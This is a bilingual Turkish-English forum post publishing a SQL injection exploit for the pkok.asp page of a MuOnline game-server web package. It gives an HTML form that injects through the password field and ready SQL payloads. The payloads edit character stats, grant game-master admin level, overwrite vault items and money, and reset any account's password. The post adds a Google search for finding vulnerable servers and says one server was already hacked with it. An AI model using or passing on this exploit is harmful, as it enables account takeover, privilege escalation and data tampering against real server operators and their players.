folder Tahribat.com Forumları
linefolder Bilişim Güvenliği
linefolder Muonline Loophole"S Webserver Package Pkok.Asp SQL Injection



Muonline Loophole"S Webserver Package Pkok.Asp SQL Injection

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Nuker
    Nuker's avatar
    Kayıt Tarihi: 09/Ekim/2005
    Erkek

    Türkçe anlatım:


     Author: nukedx a.k.a nuker
     Contacts ICQ: 10072 msn: nukedx@nukedx.com


     -CODE-
     <html
     <form action="http://[SITE]/pkok.asp" method="post"
     <input type="hidden" name="username" value="notimportant"
     <input type="hidden" name="userchr" value="letzinject"
     <input name="pass" type="text" value="notimportant';[SQLCODE]"
     <input type="submit" name="submit" value="Do IT!"
     </form
     </html
     -END OF CODE-
     Bu kodu .htm formatında kaydedin [SITE] yazan yere serverın ip adresini yazin
     SQL kodu ornekleri;
     -Karakter bilgisi degisme-
     update character set


    clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999
     where name='CharName';--
     Classcodelar:
     0: Dark Wizard
     1: Soul Master
     16: Dark knight
     17: Blade knight
     32: Elf
     33: Muse Elf
     48: Magic Gladiator
     64: Dark Lord
     Ctlcode bu kod adminlik seviyesini belirtir:
     0:Normal
     1: Bloklu
     8: GM
     16: GM LVL2
     -Vault editleme-
     update warehouse set items=0xITEMCODE,money=Money where
     accountid='Accoutname';--
     ITEMCODE yazan yere itemproject programından aldıgınız kodu yazın bu programı
     itemproject olarak googleda aratabilirsiniz
     ;)
     -Account sifresi degisme-
     update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--


    English:


     Author: nukedx a.k.a nuker
     Contacts ICQ: 10072 msn: nukedx@nukedx.com


     -CODE-
     <html
     <form action="http://[SITE]/pkok.asp" method="post"
     <input type="hidden" name="username" value="notimportant"
     <input type="hidden" name="userchr" value="letzinject"
     <input name="pass" type="text" value="notimportant';[SQLCODE]"
     <input type="submit" name="submit" value="Do IT!"
     </form
     </html
     -END OF CODE-
     Save this code as .htm and replace [SITE] to your server address
     Some SQL Examples;
     -Changing character data-
     update character set


    clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999
     where name='CharName';--
     Classcodes arE:
     0: Dark Wizard
     1: Soul Master
     16: Dark knight
     17: Blade knight
     32: Elf
     33: Muse Elf
     48: Magic Gladiator
     64: Dark Lord
     Ctlcode is admin level code:
     0:Normal
     1: Blocked
     8: GM
     16: GM LVL2
     -Blasting Vault-
     update warehouse set items=0xITEMCODE,money=Money where
     accountid='Accoutname';--
     ITEMCODE is which u can get from itemproject.exe u can find it on google
     ;)
     -Changing Account Password-
     update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
     Enjoy


    Bu kod ile BizMU online hacklenmistir açık adminlere bildirilmiştir.


    Bu site paketini kullanan siteleri inurl:/pkclear.asp olarak googleda aratabilirsiniz. bir cok sunucu bu paketi kullanmaktadır.


    I wish you bear with me , stay near me a.k.a nukedx
Toplam Hit: 12881 Toplam Mesaj: 1